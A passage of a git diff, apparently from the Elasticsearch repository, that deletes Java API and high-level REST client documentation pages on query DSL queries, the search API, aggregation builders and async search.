-<>:: - - Find documents where the field specified contains terms which match the - pattern specified, where the pattern supports single character wildcards - (`?`) and multi-character wildcards (`*`) - -<>:: - - Find documents where the field specified contains terms which match the - regular expression specified. - -<>:: - - Find documents where the field specified contains terms which are fuzzily - similar to the specified term. Fuzziness is measured as a - http://en.wikipedia.org/wiki/Damerau%E2%80%93Levenshtein_distance[Levenshtein edit distance] - of 1 or 2. - -<>:: - - Find documents of the specified type. - -<>:: - - Find documents with the specified type and IDs. - - -include::term-query.asciidoc[] - -include::terms-query.asciidoc[] - -include::range-query.asciidoc[] - -include::exists-query.asciidoc[] - -include::prefix-query.asciidoc[] - -include::wildcard-query.asciidoc[] - -include::regexp-query.asciidoc[] - -include::fuzzy-query.asciidoc[] - -include::type-query.asciidoc[] - -include::ids-query.asciidoc[] diff --git a/docs/java-api/query-dsl/term-query.asciidoc b/docs/java-api/query-dsl/term-query.asciidoc deleted file mode 100644 index 7c8549dbed4..00000000000 --- a/docs/java-api/query-dsl/term-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-term-query]] -==== Term Query - -See {ref}/query-dsl-term-query.html[Term Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[term] --------------------------------------------------- -<1> field -<2> text diff --git a/docs/java-api/query-dsl/terms-query.asciidoc b/docs/java-api/query-dsl/terms-query.asciidoc deleted file mode 100644 index 587968ba18e..00000000000 --- a/docs/java-api/query-dsl/terms-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-terms-query]] -==== Terms Query - -See {ref}/query-dsl-terms-query.html[Terms Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[terms] --------------------------------------------------- -<1> field -<2> values diff --git a/docs/java-api/query-dsl/type-query.asciidoc b/docs/java-api/query-dsl/type-query.asciidoc deleted file mode 100644 index 160deedb9ea..00000000000 --- a/docs/java-api/query-dsl/type-query.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[[java-query-dsl-type-query]] -==== Type Query - -deprecated[7.0.0] - -Types are being removed, prefer filtering on a field instead. For -more information, see {ref}/removal-of-types.html[Removal of mapping types]. - -See {ref}/query-dsl-type-query.html[Type Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[type] --------------------------------------------------- -<1> type diff --git a/docs/java-api/query-dsl/wildcard-query.asciidoc b/docs/java-api/query-dsl/wildcard-query.asciidoc deleted file mode 100644 index f9ace822aac..00000000000 --- a/docs/java-api/query-dsl/wildcard-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-wildcard-query]] -==== Wildcard Query - -See {ref}/query-dsl-wildcard-query.html[Wildcard Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[wildcard] --------------------------------------------------- -<1> field -<2> wildcard expression diff --git a/docs/java-api/query-dsl/wrapper-query.asciidoc b/docs/java-api/query-dsl/wrapper-query.asciidoc deleted file mode 100644 index 3bdf3cc69d3..00000000000 --- a/docs/java-api/query-dsl/wrapper-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-wrapper-query]] -==== Wrapper Query - -See {ref}/query-dsl-wrapper-query.html[Wrapper Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[wrapper] --------------------------------------------------- - -<1> query defined as query builder diff --git a/docs/java-api/search.asciidoc b/docs/java-api/search.asciidoc deleted file mode 100644 index 39b451fe266..00000000000 --- a/docs/java-api/search.asciidoc +++ /dev/null @@ -1,250 +0,0 @@ -[[java-search]] -== Search API - -The search API allows one to execute a search query and get back search hits -that match the query. It can be executed across one or more indices and -across one or more types. The query can be provided using the <>. -The body of the search request is built using the `SearchSourceBuilder`. Here is an example: - -[source,java] --------------------------------------------------- -import org.elasticsearch.action.search.SearchResponse; -import org.elasticsearch.action.search.SearchType; -import org.elasticsearch.index.query.QueryBuilders.*; --------------------------------------------------- - -[source,java] --------------------------------------------------- -SearchResponse response = client.prepareSearch("index1", "index2") - .setSearchType(SearchType.DFS_QUERY_THEN_FETCH) - .setQuery(QueryBuilders.termQuery("multi", "test")) // Query - .setPostFilter(QueryBuilders.rangeQuery("age").from(12).to(18)) // Filter - .setFrom(0).setSize(60).setExplain(true) - .get(); --------------------------------------------------- - -Note that all parameters are optional. Here is the smallest search call -you can write: - -[source,java] --------------------------------------------------- -// MatchAll on the whole cluster with all default options -SearchResponse response = client.prepareSearch().get(); --------------------------------------------------- - -NOTE: Although the Java API defines the additional search types QUERY_AND_FETCH and - DFS_QUERY_AND_FETCH, these modes are internal optimizations and should not - be specified explicitly by users of the API. - -For more information on the search operation, check out the REST -{ref}/search.html[search] docs. - - -[[java-search-scrolling]] -=== Using scrolls in Java - -Read the {ref}/search-request-body.html#request-body-search-scroll[scroll documentation] -first! - -[source,java] --------------------------------------------------- -import static org.elasticsearch.index.query.QueryBuilders.*; - -QueryBuilder qb = termQuery("multi", "test"); - -SearchResponse scrollResp = client.prepareSearch(test) - .addSort(FieldSortBuilder.DOC_FIELD_NAME, SortOrder.ASC) - .setScroll(new TimeValue(60000)) - .setQuery(qb) - .setSize(100).get(); //max of 100 hits will be returned for each scroll -//Scroll until no hits are returned -do { - for (SearchHit hit : scrollResp.getHits().getHits()) { - //Handle the hit... - } - - scrollResp = client.prepareSearchScroll(scrollResp.getScrollId()).setScroll(new TimeValue(60000)).execute().actionGet(); -} while(scrollResp.getHits().getHits().length != 0); // Zero hits mark the end of the scroll and the while loop. --------------------------------------------------- - -[[java-search-msearch]] -=== MultiSearch API - -See {ref}/search-multi-search.html[MultiSearch API Query] -documentation - -[source,java] --------------------------------------------------- -SearchRequestBuilder srb1 = client - .prepareSearch().setQuery(QueryBuilders.queryStringQuery("elasticsearch")).setSize(1); -SearchRequestBuilder srb2 = client - .prepareSearch().setQuery(QueryBuilders.matchQuery("name", "kimchy")).setSize(1); - -MultiSearchResponse sr = client.prepareMultiSearch() - .add(srb1) - .add(srb2) - .get(); - -// You will get all individual responses from MultiSearchResponse#getResponses() -long nbHits = 0; -for (MultiSearchResponse.Item item : sr.getResponses()) { - SearchResponse response = item.getResponse(); - nbHits += response.getHits().getTotalHits().value; -} --------------------------------------------------- - - -[[java-search-aggs]] -=== Using Aggregations - -The following code shows how to add two aggregations within your search: - -[source,java] --------------------------------------------------- -SearchResponse sr = client.prepareSearch() - .setQuery(QueryBuilders.matchAllQuery()) - .addAggregation( - AggregationBuilders.terms("agg1").field("field") - ) - .addAggregation( - AggregationBuilders.dateHistogram("agg2") - .field("birth") - .calendarInterval(DateHistogramInterval.YEAR) - ) - .get(); - -// Get your facet results -Terms agg1 = sr.getAggregations().get("agg1"); -Histogram agg2 = sr.getAggregations().get("agg2"); --------------------------------------------------- - -See <> -documentation for details. - - -[[java-search-terminate-after]] -=== Terminate After - -The maximum number of documents to collect for each shard, upon reaching which the query execution will terminate early. -If set, you will be able to check if the operation terminated early by asking for `isTerminatedEarly()` in the -`SearchResponse` object: - -[source,java] --------------------------------------------------- -SearchResponse sr = client.prepareSearch(INDEX) - .setTerminateAfter(1000) <1> - .get(); - -if (sr.isTerminatedEarly()) { - // We finished early -} --------------------------------------------------- -<1> Finish after 1000 docs - -[[java-search-template]] -=== Search Template - -See {ref}/search-template.html[Search Template] documentation - -Define your template parameters as a `Map`: - -[source,java] --------------------------------------------------- -Map template_params = new HashMap<>(); -template_params.put("param_gender", "male"); --------------------------------------------------- - -You can use your stored search templates in `config/scripts`. -For example, if you have a file named `config/scripts/template_gender.mustache` containing: - -[source,js] --------------------------------------------------- -{ - "query" : { - "match" : { - "gender" : "{{param_gender}}" - } - } -} --------------------------------------------------- -// NOTCONSOLE - -Create your search template request: - -[source,java] --------------------------------------------------- -SearchResponse sr = new SearchTemplateRequestBuilder(client) - .setScript("template_gender") <1> - .setScriptType(ScriptService.ScriptType.FILE) <2> - .setScriptParams(template_params) <3> - .setRequest(new SearchRequest()) <4> - .get() <5> - .getResponse(); <6> --------------------------------------------------- -<1> template name -<2> template stored on disk in `gender_template.mustache` -<3> parameters -<4> set the execution context (ie. define the index name here) -<5> execute and get the template response -<6> get from the template response the search response itself - -You can also store your template in the cluster state: - -[source,java] --------------------------------------------------- -client.admin().cluster().preparePutStoredScript() - .setScriptLang("mustache") - .setId("template_gender") - .setSource(new BytesArray( - "{\n" + - " \"query\" : {\n" + - " \"match\" : {\n" + - " \"gender\" : \"{{param_gender}}\"\n" + - " }\n" + - " }\n" + - "}")).get(); --------------------------------------------------- - -To execute a stored templates, use `ScriptService.ScriptType.STORED`: - -[source,java] --------------------------------------------------- -SearchResponse sr = new SearchTemplateRequestBuilder(client) - .setScript("template_gender") <1> - .setScriptType(ScriptType.STORED) <2> - .setScriptParams(template_params) <3> - .setRequest(new SearchRequest()) <4> - .get() <5> - .getResponse(); <6> --------------------------------------------------- -<1> template name -<2> template stored in the cluster state -<3> parameters -<4> set the execution context (ie. define the index name here) -<5> execute and get the template response -<6> get from the template response the search response itself - -You can also execute inline templates: - -[source,java] --------------------------------------------------- -sr = new SearchTemplateRequestBuilder(client) - .setScript("{\n" + <1> - " \"query\" : {\n" + - " \"match\" : {\n" + - " \"gender\" : \"{{param_gender}}\"\n" + - " }\n" + - " }\n" + - "}") - .setScriptType(ScriptType.INLINE) <2> - .setScriptParams(template_params) <3> - .setRequest(new SearchRequest()) <4> - .get() <5> - .getResponse(); <6> --------------------------------------------------- -<1> template's body -<2> template is passed inline -<3> parameters -<4> set the execution context (ie. define the index name here) -<5> execute and get the template response -<6> get from the template response the search response itself diff --git a/docs/java-rest/high-level/aggs-builders.asciidoc b/docs/java-rest/high-level/aggs-builders.asciidoc deleted file mode 100644 index 57c09e4e9b4..00000000000 --- a/docs/java-rest/high-level/aggs-builders.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[java-rest-high-aggregation-builders]] -=== Building Aggregations - -This page lists all the available aggregations with their corresponding `AggregationBuilder` class name and helper method name in the -`AggregationBuilders` or `PipelineAggregatorBuilders` utility classes. - -:agg-ref: {elasticsearch-javadoc}/org/elasticsearch/search/aggregations -:parentjoin-ref: {parent-join-client-javadoc}/org/elasticsearch/join/aggregations -:matrixstats-ref: {matrixstats-client-javadoc}/org/elasticsearch/search/aggregations - -==== Metrics Aggregations -[options="header"] -|====== -| Aggregation | AggregationBuilder Class | Method in AggregationBuilders -| {ref}/search-aggregations-metrics-avg-aggregation.html[Avg] | {agg-ref}/metrics/AvgAggregationBuilder.html[AvgAggregationBuilder] | {agg-ref}/AggregationBuilders.html#avg-java.lang.String-[AggregationBuilders.avg()] -| {ref}/search-aggregations-metrics-cardinality-aggregation.html[Cardinality] | {agg-ref}/metrics/CardinalityAggregationBuilder.html[CardinalityAggregationBuilder] | {agg-ref}/AggregationBuilders.html#cardinality-java.lang.String-[AggregationBuilders.cardinality()] -| {ref}/search-aggregations-metrics-extendedstats-aggregation.html[Extended Stats] | {agg-ref}/metrics/ExtendedStatsAggregationBuilder.html[ExtendedStatsAggregationBuilder] | {agg-ref}/AggregationBuilders.html#extendedStats-java.lang.String-[AggregationBuilders.extendedStats()] -| {ref}/search-aggregations-metrics-geobounds-aggregation.html[Geo Bounds] | {agg-ref}/metrics/GeoBoundsAggregationBuilder.html[GeoBoundsAggregationBuilder] | {agg-ref}/AggregationBuilders.html#geoBounds-java.lang.String-[AggregationBuilders.geoBounds()] -| {ref}/search-aggregations-metrics-geocentroid-aggregation.html[Geo Centroid] | {agg-ref}/metrics/GeoCentroidAggregationBuilder.html[GeoCentroidAggregationBuilder] | {agg-ref}/AggregationBuilders.html#geoCentroid-java.lang.String-[AggregationBuilders.geoCentroid()] -| {ref}/search-aggregations-metrics-max-aggregation.html[Max] | {agg-ref}/metrics/MaxAggregationBuilder.html[MaxAggregationBuilder] | {agg-ref}/AggregationBuilders.html#max-java.lang.String-[AggregationBuilders.max()] -| {ref}/search-aggregations-metrics-min-aggregation.html[Min] | {agg-ref}/metrics/MinAggregationBuilder.html[MinAggregationBuilder] | {agg-ref}/AggregationBuilders.html#min-java.lang.String-[AggregationBuilders.min()] -| {ref}/search-aggregations-metrics-percentile-aggregation.html[Percentiles] | {agg-ref}/metrics/PercentilesAggregationBuilder.html[PercentilesAggregationBuilder] | {agg-ref}/AggregationBuilders.html#percentiles-java.lang.String-[AggregationBuilders.percentiles()] -| {ref}/search-aggregations-metrics-percentile-rank-aggregation.html[Percentile Ranks] | {agg-ref}/metrics/PercentileRanksAggregationBuilder.html[PercentileRanksAggregationBuilder] | {agg-ref}/AggregationBuilders.html#percentileRanks-java.lang.String-[AggregationBuilders.percentileRanks()] -| {ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Scripted Metric] | {agg-ref}/metrics/ScriptedMetricAggregationBuilder.html[ScriptedMetricAggregationBuilder] | {agg-ref}/AggregationBuilders.html#scriptedMetric-java.lang.String-[AggregationBuilders.scriptedMetric()] -| {ref}/search-aggregations-metrics-stats-aggregation.html[Stats] | {agg-ref}/metrics/StatsAggregationBuilder.html[StatsAggregationBuilder] | {agg-ref}/AggregationBuilders.html#stats-java.lang.String-[AggregationBuilders.stats()] -| {ref}/search-aggregations-metrics-sum-aggregation.html[Sum] | {agg-ref}/metrics/SumAggregationBuilder.html[SumAggregationBuilder] | {agg-ref}/AggregationBuilders.html#sum-java.lang.String-[AggregationBuilders.sum()] -| {ref}/search-aggregations-metrics-top-hits-aggregation.html[Top hits] | {agg-ref}/metrics/TopHitsAggregationBuilder.html[TopHitsAggregationBuilder] | {agg-ref}/AggregationBuilders.html#topHits-java.lang.String-[AggregationBuilders.topHits()] -| {ref}/search-aggregations-metrics-top-metrics.html[Top Metrics] | {javadoc-client}/analytics/TopMetricsAggregationBuilder.html[TopMetricsAggregationBuilder] | None -| {ref}/search-aggregations-metrics-valuecount-aggregation.html[Value Count] | {agg-ref}/metrics/ValueCountAggregationBuilder.html[ValueCountAggregationBuilder] | {agg-ref}/AggregationBuilders.html#count-java.lang.String-[AggregationBuilders.count()] -| {ref}/search-aggregations-metrics-string-stats-aggregation.html[String Stats] | {javadoc-client}/analytics/StringStatsAggregationBuilder.html[StringStatsAggregationBuilder] | None -|====== - -==== Bucket Aggregations -[options="header"] -|====== -| Aggregation | AggregationBuilder Class | Method in AggregationBuilders -| {ref}/search-aggregations-bucket-adjacency-matrix-aggregation.html[Adjacency Matrix] | {agg-ref}/bucket/adjacency/AdjacencyMatrixAggregationBuilder.html[AdjacencyMatrixAggregationBuilder] | {agg-ref}/AggregationBuilders.html#adjacencyMatrix-java.lang.String-java.util.Map-[AggregationBuilders.adjacencyMatrix()] -| {ref}/search-aggregations-bucket-children-aggregation.html[Children] | {parentjoin-ref}/ChildrenAggregationBuilder.html[ChildrenAggregationBuilder] | -| {ref}/search-aggregations-bucket-datehistogram-aggregation.html[Date Histogram] | {agg-ref}/bucket/histogram/DateHistogramAggregationBuilder.html[DateHistogramAggregationBuilder] | {agg-ref}/AggregationBuilders.html#dateHistogram-java.lang.String-[AggregationBuilders.dateHistogram()] -| {ref}/search-aggregations-bucket-daterange-aggregation.html[Date Range] | {agg-ref}/bucket/range/DateRangeAggregationBuilder.html[DateRangeAggregationBuilder] | {agg-ref}/AggregationBuilders.html#dateRange-java.lang.String-[AggregationBuilders.dateRange()] -| {ref}/search-aggregations-bucket-diversified-sampler-aggregation.html[Diversified Sampler] | {agg-ref}/bucket/sampler/DiversifiedAggregationBuilder.html[DiversifiedAggregationBuilder] | {agg-ref}/AggregationBuilders.html#diversifiedSampler-java.lang.String-[AggregationBuilders.diversifiedSampler()] -| {ref}/search-aggregations-bucket-filter-aggregation.html[Filter] | {agg-ref}/bucket/filter/FilterAggregationBuilder.html[FilterAggregationBuilder] | {agg-ref}/AggregationBuilders.html#filter-java.lang.String-org.elasticsearch.index.query.QueryBuilder-[AggregationBuilders.filter()] -| {ref}/search-aggregations-bucket-filters-aggregation.html[Filters] | {agg-ref}/bucket/filters/FiltersAggregationBuilder.html[FiltersAggregationBuilder] | {agg-ref}/AggregationBuilders.html#filters-java.lang.String-org.elasticsearch.index.query.QueryBuilder...-[AggregationBuilders.filters()] -| {ref}/search-aggregations-bucket-geodistance-aggregation.html[Geo Distance] | {agg-ref}/bucket/range/GeoDistanceAggregationBuilder.html[GeoDistanceAggregationBuilder] | {agg-ref}/AggregationBuilders.html#geoDistance-java.lang.String-org.elasticsearch.common.geo.GeoPoint-[AggregationBuilders.geoDistance()] -| {ref}/search-aggregations-bucket-geohashgrid-aggregation.html[GeoHash Grid] | {agg-ref}/bucket/geogrid/GeoGridAggregationBuilder.html[GeoGridAggregationBuilder] | {agg-ref}/AggregationBuilders.html#geohashGrid-java.lang.String-[AggregationBuilders.geohashGrid()] -| {ref}/search-aggregations-bucket-global-aggregation.html[Global] | {agg-ref}/bucket/global/GlobalAggregationBuilder.html[GlobalAggregationBuilder] | {agg-ref}/AggregationBuilders.html#global-java.lang.String-[AggregationBuilders.global()] -| {ref}/search-aggregations-bucket-histogram-aggregation.html[Histogram] | {agg-ref}/bucket/histogram/HistogramAggregationBuilder.html[HistogramAggregationBuilder] | {agg-ref}/AggregationBuilders.html#histogram-java.lang.String-[AggregationBuilders.histogram()] -| {ref}/search-aggregations-bucket-iprange-aggregation.html[IP Range] | {agg-ref}/bucket/range/IpRangeAggregationBuilder.html[IpRangeAggregationBuilder] | {agg-ref}/AggregationBuilders.html#ipRange-java.lang.String-[AggregationBuilders.ipRange()] -| {ref}/search-aggregations-bucket-missing-aggregation.html[Missing] | {agg-ref}/bucket/missing/MissingAggregationBuilder.html[MissingAggregationBuilder] | {agg-ref}/AggregationBuilders.html#missing-java.lang.String-[AggregationBuilders.missing()] -| {ref}/search-aggregations-bucket-nested-aggregation.html[Nested] | {agg-ref}/bucket/nested/NestedAggregationBuilder.html[NestedAggregationBuilder] | {agg-ref}/AggregationBuilders.html#nested-java.lang.String-java.lang.String-[AggregationBuilders.nested()] -| {ref}/search-aggregations-bucket-range-aggregation.html[Range] | {agg-ref}/bucket/range/RangeAggregationBuilder.html[RangeAggregationBuilder] | {agg-ref}/AggregationBuilders.html#range-java.lang.String-[AggregationBuilders.range()] -| {ref}/search-aggregations-bucket-reverse-nested-aggregation.html[Reverse nested] | {agg-ref}/bucket/nested/ReverseNestedAggregationBuilder.html[ReverseNestedAggregationBuilder] | {agg-ref}/AggregationBuilders.html#reverseNested-java.lang.String-[AggregationBuilders.reverseNested()] -| {ref}/search-aggregations-bucket-sampler-aggregation.html[Sampler] | {agg-ref}/bucket/sampler/SamplerAggregationBuilder.html[SamplerAggregationBuilder] | {agg-ref}/AggregationBuilders.html#sampler-java.lang.String-[AggregationBuilders.sampler()] -| {ref}/search-aggregations-bucket-significantterms-aggregation.html[Significant Terms] | {agg-ref}/bucket/significant/SignificantTermsAggregationBuilder.html[SignificantTermsAggregationBuilder] | {agg-ref}/AggregationBuilders.html#significantTerms-java.lang.String-[AggregationBuilders.significantTerms()] -| {ref}/search-aggregations-bucket-significanttext-aggregation.html[Significant Text] | {agg-ref}/bucket/significant/SignificantTextAggregationBuilder.html[SignificantTextAggregationBuilder] | {agg-ref}/AggregationBuilders.html#significantText-java.lang.String-java.lang.String-[AggregationBuilders.significantText()] -| {ref}/search-aggregations-bucket-terms-aggregation.html[Terms] | {agg-ref}/bucket/terms/TermsAggregationBuilder.html[TermsAggregationBuilder] | {agg-ref}/AggregationBuilders.html#terms-java.lang.String-[AggregationBuilders.terms()] -|====== - -==== Pipeline Aggregations -[options="header"] -|====== -| Pipeline on | PipelineAggregationBuilder Class | Method in PipelineAggregatorBuilders -| {ref}/search-aggregations-pipeline-avg-bucket-aggregation.html[Avg Bucket] | {agg-ref}/pipeline/AvgBucketPipelineAggregationBuilder.html[AvgBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#avgBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.avgBucket()] -| {ref}/search-aggregations-pipeline-derivative-aggregation.html[Derivative] | {agg-ref}/pipeline/DerivativePipelineAggregationBuilder.html[DerivativePipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#derivative-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.derivative()] -| {ref}/search-aggregations-pipeline-inference-bucket-aggregation.html[Inference] | {javadoc-client}/analytics/InferencePipelineAggregationBuilder.html[InferencePipelineAggregationBuilder] | None -| {ref}/search-aggregations-pipeline-max-bucket-aggregation.html[Max Bucket] | {agg-ref}/pipeline/MaxBucketPipelineAggregationBuilder.html[MaxBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#maxBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.maxBucket()] -| {ref}/search-aggregations-pipeline-min-bucket-aggregation.html[Min Bucket] | {agg-ref}/pipeline/MinBucketPipelineAggregationBuilder.html[MinBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#minBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.minBucket()] -| {ref}/search-aggregations-pipeline-sum-bucket-aggregation.html[Sum Bucket] | {agg-ref}/pipeline/SumBucketPipelineAggregationBuilder.html[SumBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#sumBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.sumBucket()] -| {ref}/search-aggregations-pipeline-stats-bucket-aggregation.html[Stats Bucket] | {agg-ref}/pipeline/StatsBucketPipelineAggregationBuilder.html[StatsBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#statsBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.statsBucket()] -| {ref}/search-aggregations-pipeline-extended-stats-bucket-aggregation.html[Extended Stats Bucket] | {agg-ref}/pipeline/ExtendedStatsBucketPipelineAggregationBuilder.html[ExtendedStatsBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#extendedStatsBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.extendedStatsBucket()] -| {ref}/search-aggregations-pipeline-percentiles-bucket-aggregation.html[Percentiles Bucket] | {agg-ref}/pipeline/PercentilesBucketPipelineAggregationBuilder.html[PercentilesBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#percentilesBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.percentilesBucket()] -| {ref}/search-aggregations-pipeline-movavg-aggregation.html[Moving Average] | {agg-ref}/pipeline/MovAvgPipelineAggregationBuilder.html[MovAvgPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#movingAvg-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.movingAvg()] -| {ref}/search-aggregations-pipeline-cumulative-sum-aggregation.html[Cumulative Sum] | {agg-ref}/pipeline/CumulativeSumPipelineAggregationBuilder.html[CumulativeSumPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#cumulativeSum-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.cumulativeSum()] -| {ref}/search-aggregations-pipeline-bucket-script-aggregation.html[Bucket Script] | {agg-ref}/pipeline/BucketScriptPipelineAggregationBuilder.html[BucketScriptPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#bucketScript-java.lang.String-java.util.Map-org.elasticsearch.script.Script-[PipelineAggregatorBuilders.bucketScript()] -| {ref}/search-aggregations-pipeline-bucket-selector-aggregation.html[Bucket Selector] | {agg-ref}/pipeline/BucketSelectorPipelineAggregationBuilder.html[BucketSelectorPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#bucketSelector-java.lang.String-java.util.Map-org.elasticsearch.script.Script-[PipelineAggregatorBuilders.bucketSelector()] -| {ref}/search-aggregations-pipeline-serialdiff-aggregation.html[Serial Differencing] | {agg-ref}/pipeline/SerialDiffPipelineAggregationBuilder.html[SerialDiffPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#diff-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.diff()] -|====== - -==== Matrix Aggregations -[options="header"] -|====== -| Aggregation | AggregationBuilder Class | Method in MatrixStatsAggregationBuilders -| {ref}/search-aggregations-matrix-stats-aggregation.html[Matrix Stats] | {matrixstats-ref}/matrix/stats/MatrixStatsAggregationBuilder.html[MatrixStatsAggregationBuilder] | {matrixstats-ref}/MatrixStatsAggregationBuilders.html#matrixStats-java.lang.String-[MatrixStatsAggregationBuilders.matrixStats()] -|====== diff --git a/docs/java-rest/high-level/asyncsearch/delete.asciidoc b/docs/java-rest/high-level/asyncsearch/delete.asciidoc deleted file mode 100644 index f38961fe28c..00000000000 --- a/docs/java-rest/high-level/asyncsearch/delete.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ --- -:api: asyncsearch-delete -:request: DeleteAsyncSearchRequest -:response: AcknowledgedResponse --- - -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Async Search API - -[id="{upid}-{api}-request"] -==== Request - -A +{request}+ allows deleting a running asynchronous search task using -its id. Required arguments are the `id` of a running search: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-sync"] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- -<1> Execute the request and get back the response as an +{response}+ object. - -[id="{upid}-{api}-async"] -==== Asynchronous Execution - -The asynchronous execution of a +{request}+ allows to use an -`ActionListener` to be called back when the submit request returns: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates the acknowledgement of the request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isAcknowledged` was the deletion request acknowledged or not. \ No newline at end of file diff --git a/docs/java-rest/high-level/asyncsearch/get.asciidoc b/docs/java-rest/high-level/asyncsearch/get.asciidoc deleted file mode 100644 index 531c341d64b..00000000000 --- a/docs/java-rest/high-level/asyncsearch/get.asciidoc +++ /dev/null @@ -1,87 +0,0 @@ --- -:api: asyncsearch-get -:request: GetAsyncSearchRequest -:response: AsyncSearchResponse --- - -[role="xpack"] -[id="{upid}-{api}"] -=== Get Async Search API - -[id="{upid}-{api}-request"] -==== Request - -A +{request}+ allows to get a running asynchronous search task by -its id. Required arguments are the `id` of a running async search: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-arguments] --------------------------------------------------- -<1> The minimum time that the request should wait before -returning a partial result (defaults to no wait). -<2> The expiration time of the request (defaults to none). - - -[id="{upid}-{api}-sync"] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- -<1> Execute the request and get back the response as an +{response}+ object. - -[id="{upid}-{api}-async"] -==== Asynchronous Execution - -The asynchronous execution of a +{request}+ allows to use an -`ActionListener` to be called back when the submit request returns: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The `SearchResponse`, or `null` if not available yet -<2> The id of the async search request, `null` if the response isn't stored -<3> `true` when the response contains partial results -<4> `true` when the search is still running -<5> The time the response was created (millis since epoch) -<6> The time the response expires (millis since epoch) -<7> Get failure reasons or `null` for no failures diff --git a/docs/java-rest/high-level/asyncsearch/submit.asciidoc b/docs/java-rest/high-level/asyncsearch/submit.asciidoc deleted file mode 100644 index cfe78f1d121..00000000000 --- a/docs/java-rest/high-level/asyncsearch/submit.asciidoc +++ /dev/null @@ -1,94 +0,0 @@ --- -:api: asyncsearch-submit -:request: SubmitAsyncSearchRequest -:response: AsyncSearchResponse --- - -[role="xpack"] -[id="{upid}-{api}"] -=== Submit Async Search API - -[id="{upid}-{api}-request"] -==== Request - -A +{request}+ allows to submit an asynchronous search task to -the cluster. Required arguments are the `SearchSourceBuilder` defining -the search and the target indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- 